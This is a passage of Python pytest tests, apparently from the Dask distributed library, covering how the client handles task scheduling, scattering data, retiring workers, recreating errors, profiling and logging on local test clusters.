assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
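# The list scattered to worker a is comparatively large; with task durations pinned to
# 10ms, the scheduler should weigh the cost of moving that data against occupancy and
# keep at least half of the f calls on a.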
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
t = time()
while len(S) < 4 and time() - t < 2.0:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
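# Helper: scan the scheduler's transition log and fail if a task that was in "memory"
# was released with a recommendation to go back to "waiting", which would mean
# computed data was lost.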
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True, timeout=None)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.flaky(reruns=10, reruns_delay=5, condition=MACOS)
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
c = Client("127.0.0.1:57484", asynchronous=True)
s = Scheduler(loop=c.loop, port=57484)
await asyncio.sleep(4)
try:
await s
except EnvironmentError: # port in use
await c.close()
return
start = time()
await c
try:
assert time() < start + 2
finally:
await c.close()
await s.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
start = time()
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_get_future_error_simple(c, s, a, b):
f = c.submit(div, 1, 0)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
# args contains only solid values, not keys
assert function.__name__ == "div"
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_get_futures_error(c, s, a, b):
x0 = delayed(dec)(2, dask_key_name="x0")
y0 = delayed(dec)(1, dask_key_name="y0")
x = delayed(div)(1, x0, dask_key_name="x")
y = delayed(div)(1, y0, dask_key_name="y")
tot = delayed(sum)(x, y, dask_key_name="tot")
f = c.compute(tot)
await wait(f)
assert f.status == "error"
function, args, kwargs, deps = await c._get_futures_error(f)
assert function.__name__ == "div"
assert args == (1, y0.key)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._recreate_error_locally(f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
function, args, kwargs = await c._recreate_error_locally(df3)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
func, args, kwargs = await c._recreate_error_locally(zz)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
start = time()
while a.status != Status.closed:
await asyncio.sleep(0.01)
assert time() < start + 5
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
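# A fired-and-forgotten task should run to completion even though no Future is held
# for it; once it has run, only the task backing the original future remains on the
# scheduler.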
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
start = time()
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert time() < start + 2
assert distributed.foo == 123
finally:
del distributed.foo
start = time()
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert time() < start + 2
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(loop=loop, processes=False, threads_per_worker=4) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
start = time()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=r"^{}$".format(msg)):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1, timeout=100)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@pytest.mark.flaky(reruns=10, reruns_delay=5)
@pytest.mark.slow
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2, timeout=60)
async def test_secede_balances(c, s, a, b):
count = threading.active_count()
def f(x):
client = get_client()
sleep(0.01) # do some work
secede()
futures = client.map(slowinc, range(10), pure=False, delay=0.01)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(100))
start = time()
while not all(f.status == "finished" for f in futures):
await asyncio.sleep(0.01)
assert threading.active_count() < count + 50
assert time() < start + 60
assert len(a.log) < 2 * len(b.log)
assert len(b.log) < 2 * len(a.log)
results = await c.gather(futures)
assert results == [sum(map(inc, range(10)))] * 100
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def f():
client = get_client()
client.submit(slowinc, 1, delay=0.2, key="slowinc")
future = c.submit(f, key="f")
await asyncio.sleep(0.1)
if len(s.tasks) == 2:
assert (
s.priorities["f"] > s.priorities["slowinc"]
) # lower values schedule first
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
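# Recursively submits more work from inside a running task: the task secedes from the
# worker's thread pool so the nested tasks it spawns can complete without deadlocking
# the pool.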
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def _test_dynamic_workloads_sync(c, delay):
future = c.submit(_dynamic_workload, 0, delay=delay)
assert future.result(timeout=40) == 52
def test_dynamic_workloads_sync(c):
_test_dynamic_workloads_sync(c, delay=0.02)
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
_test_dynamic_workloads_sync(c, delay="random")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = type("")
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = type("")
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(
loop=loop, scheduler_port=0, dashboard_address=None, silence_logs=False
) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
ts = a.tasks.get(future.key)
if ts is not None and ts.state == "executing":
w = a
else:
w = b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing_count else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
start = time()
while future.status != "finished":
await asyncio.sleep(0.01)
assert time() < start + 1
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text or "1.91 MiB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster()
async def test_scatter_direct(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
start = time()
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
assert time() < start + 5
await c.close()
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
d = {"a": 1}
result = await c.submit(d.get, "a")
assert result == 1
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
